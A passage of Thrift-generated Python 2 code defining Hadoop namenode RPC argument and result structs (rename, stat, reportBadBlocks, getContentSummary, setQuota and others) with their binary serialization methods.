    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('refreshNodes_result')
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class rename_args(object):
  """
  Thrift-generated argument struct for the rename RPC.

  Attributes:
   - ctx
   - path: Path to existing file or directory.
   - newPath: New path.
  """
  # Field metadata indexed by Thrift field id; None entries are unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    (2, TType.STRING, 'newPath', None, None, ), # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )
  def __init__(self, ctx=None, path=None, newPath=None,):
    self.ctx = ctx
    self.path = path
    self.newPath = newPath
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.STRING:
          self.newPath = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('rename_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.newPath is not None:
      oprot.writeFieldBegin('newPath', TType.STRING, 2)
      oprot.writeString(self.newPath)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class rename_result(object):
  """
  Thrift-generated result struct for the rename RPC: a bool on success,
  or an IOException.

  Attributes:
   - success
   - err
  """
  # Field metadata indexed by Thrift field id (0 is the return value).
  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('rename_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class reportBadBlocks_args(object):
  """
  Thrift-generated argument struct for the reportBadBlocks RPC.

  Attributes:
   - ctx
   - blocks: List of corrupted blocks.
  """
  # Field metadata indexed by Thrift field id; None entries are unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.LIST, 'blocks', (TType.STRUCT,(Block, Block.thrift_spec)), None, ), # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )
  def __init__(self, ctx=None, blocks=None,):
    self.ctx = ctx
    self.blocks = blocks
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.LIST:
          self.blocks = []
          (_etype31, _size28) = iprot.readListBegin()
          for _i32 in xrange(_size28):
            _elem33 = Block()
            _elem33.read(iprot)
            self.blocks.append(_elem33)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('reportBadBlocks_args')
    if self.blocks is not None:
      oprot.writeFieldBegin('blocks', TType.LIST, 1)
      oprot.writeListBegin(TType.STRUCT, len(self.blocks))
      for iter34 in self.blocks:
        iter34.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class reportBadBlocks_result(object):
  """
  Thrift-generated result struct for the reportBadBlocks RPC.

  Attributes:
   - err
  """
  # Field metadata indexed by Thrift field id; None entries are unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )
  def __init__(self, err=None,):
    self.err = err
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('reportBadBlocks_result')
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class stat_args(object):
  """
  Thrift-generated argument struct for the stat RPC.

  Attributes:
   - ctx
   - path: Path of the file or directory.
  """
  # Field metadata indexed by Thrift field id; None entries are unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )
  def __init__(self, ctx=None, path=None,):
    self.ctx = ctx
    self.path = path
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('stat_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class stat_result(object):
  """
  Thrift-generated result struct for the stat RPC: a Stat on success,
  or an IOException.

  Attributes:
   - success
   - err
  """
  # Field metadata indexed by Thrift field id (0 is the return value).
  thrift_spec = (
    (0, TType.STRUCT, 'success', (Stat, Stat.thrift_spec), None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = Stat()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('stat_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class getContentSummary_args(object):
  """
  Thrift-generated argument struct for the getContentSummary RPC.

  Attributes:
   - ctx
   - Path
  """
  # Field metadata indexed by Thrift field id; None entries are unused ids.
  # NOTE: the field is capitalized 'Path' in the IDL; kept as generated.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'Path', None, None, ), # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )
  def __init__(self, ctx=None, Path=None,):
    self.ctx = ctx
    self.Path = Path
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.Path = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('getContentSummary_args')
    if self.Path is not None:
      oprot.writeFieldBegin('Path', TType.STRING, 1)
      oprot.writeString(self.Path)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class getContentSummary_result(object):
  """
  Thrift-generated result struct for the getContentSummary RPC:
  a ContentSummary on success, or an IOException.

  Attributes:
   - success
   - err
  """
  # Field metadata indexed by Thrift field id (0 is the return value).
  thrift_spec = (
    (0, TType.STRUCT, 'success', (ContentSummary, ContentSummary.thrift_spec), None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = ContentSummary()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('getContentSummary_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class multiGetContentSummary_args(object):
  """
  Thrift-generated argument struct for the multiGetContentSummary RPC.

  Attributes:
   - ctx
   - paths
  """
  # Field metadata indexed by Thrift field id; None entries are unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.LIST, 'paths', (TType.STRING,None), None, ), # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )
  def __init__(self, ctx=None, paths=None,):
    self.ctx = ctx
    self.paths = paths
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.LIST:
          self.paths = []
          (_etype38, _size35) = iprot.readListBegin()
          for _i39 in xrange(_size35):
            _elem40 = iprot.readString();
            self.paths.append(_elem40)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('multiGetContentSummary_args')
    if self.paths is not None:
      oprot.writeFieldBegin('paths', TType.LIST, 1)
      oprot.writeListBegin(TType.STRING, len(self.paths))
      for iter41 in self.paths:
        oprot.writeString(iter41)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class multiGetContentSummary_result(object):
  """
  Thrift-generated result struct for the multiGetContentSummary RPC:
  a list of ContentSummary on success, or an IOException.

  Attributes:
   - success
   - err
  """
  # Field metadata indexed by Thrift field id (0 is the return value).
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(ContentSummary, ContentSummary.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype45, _size42) = iprot.readListBegin()
          for _i46 in xrange(_size42):
            _elem47 = ContentSummary()
            _elem47.read(iprot)
            self.success.append(_elem47)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('multiGetContentSummary_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter48 in self.success:
        iter48.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class setQuota_args(object):
  """Thrift-generated argument struct for setQuota.

  Do not edit by hand.

  Attributes:
   - ctx: request context (field id 10)
   - path: Path of the directory.
   - namespaceQuota: Limit on the number of names in the directory.
   - diskspaceQuota: Limit on disk space occupied by all the files in the
  directory.
  """

  # thrift_spec row layout: (field id, wire type, name, nested type info, default).
  # None entries pad unused field-id slots.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    (2, TType.I64, 'namespaceQuota', None, None, ), # 2
    (3, TType.I64, 'diskspaceQuota', None, None, ), # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None, path=None, namespaceQuota=None, diskspaceQuota=None,):
    self.ctx = ctx
    self.path = path
    self.namespaceQuota = namespaceQuota
    self.diskspaceQuota = diskspaceQuota

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: field-by-field decode; unknown field ids are skipped.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I64:
          self.namespaceQuota = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 3:
        if ftype == TType.I64:
          self.diskspaceQuota = iprot.readI64();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
